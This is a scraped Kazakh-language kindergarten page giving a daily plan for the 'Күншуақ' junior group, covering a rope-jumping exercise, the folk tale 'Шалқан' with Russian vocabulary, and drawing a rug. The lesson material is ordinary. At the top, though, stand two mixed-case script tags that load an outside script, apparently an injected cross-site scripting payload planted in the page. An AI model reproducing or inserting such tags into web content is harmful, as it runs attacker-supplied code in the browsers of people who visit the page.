<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.11.2017

«Күншуақ» II кіші тобындағы тәрбиелеу мен оқыту үрдістері

Таңғы жаттығу

Асфальтқа сурет саламыз

 Білім беру саласы: Денсаулық, таным.

Тақырыбы: Жіптің (биіктігі 30-40см) үстінен секіріп өту.

Мақсаты: Балаларға жіптің үстінен секіріп өтуді қайталату және допты қос қолмен  ұстап шеңберге лақтыру үйрету. Бір-біріне кедергі жасамауларын, арақашықтықты сақтауларын қадағалау.

Күтілетін нәтиже:

Орындайды: допты қос қолмен ұстап, шеңберге лақтыруды.

Түсінеді: жіптің үстінен қалай секіріп өту керектігін.

Қолданады: әр түстегі текше, доп және ойынға қажетті заттармен орындалатын жаттығуларды орындай білу

іскерліктерін.

  Білім беру саласы: Қатынас. Әлеуметтік орта

Ұйымдастырылған оқу іс-әрекеті: Көркем әдебиет

Тақырыбы: «Шалқан» (орыс халық ертегісі)

Мақсаты: балаларды әдеби кейіпкерлердің әрекеттері мен жүріс-тұрысын талдауға, оларға қабылданған

ережелерге сәйкес баға беруге үйрету.

Билингвистикалық компонент: шалқан- репка, ата-дедушка, әже-бабушка, қыз-девочка, мысық-кошка, күшік-щенок, тышқан-мышка (қайталайды)

     

 

 

Күтілетін нәтиже:

Біледі: ертегіні мұқият тыңдауды.

Игереді: сахналау арқылы мазмұнын игереді.

Меңгереді: ертегіні зейін қойып тыңдап, кейіпкерлердің көңіл күйін сезінуді

Білім беру саласы: Шығармашылық

Бөлімі: Сурет салу.

Тақырыбы: Кілемше.

Мақсаты: Балаларды тұрмыстық заттардың әдемілігін байқай білуге үйрету. Кілеммен таныстыруды жалғастыру,

кілемді түзу және ирек сызықтармен әшекелей білуге үйрету, сурет салуға дағдыландыру. Әсемдікті сезінуге, көркемдік талғампаздыққа тәрбиелеу.

Күтілетін нәтиже:

Біледі: қонақты қалай құрметтеп қарсы алуды.

Игереді: кілемдер әртүрлі екенін, соның ішінде жолақша кілем болатынын.

Меңгереді: арақашықтықтарын бірдей сақтап, түзу сызықтарды сыза білуді.

 

 

 

 

 

Просмотров: 652


Пікір қосу



Деректерді қолтаңбаға қосу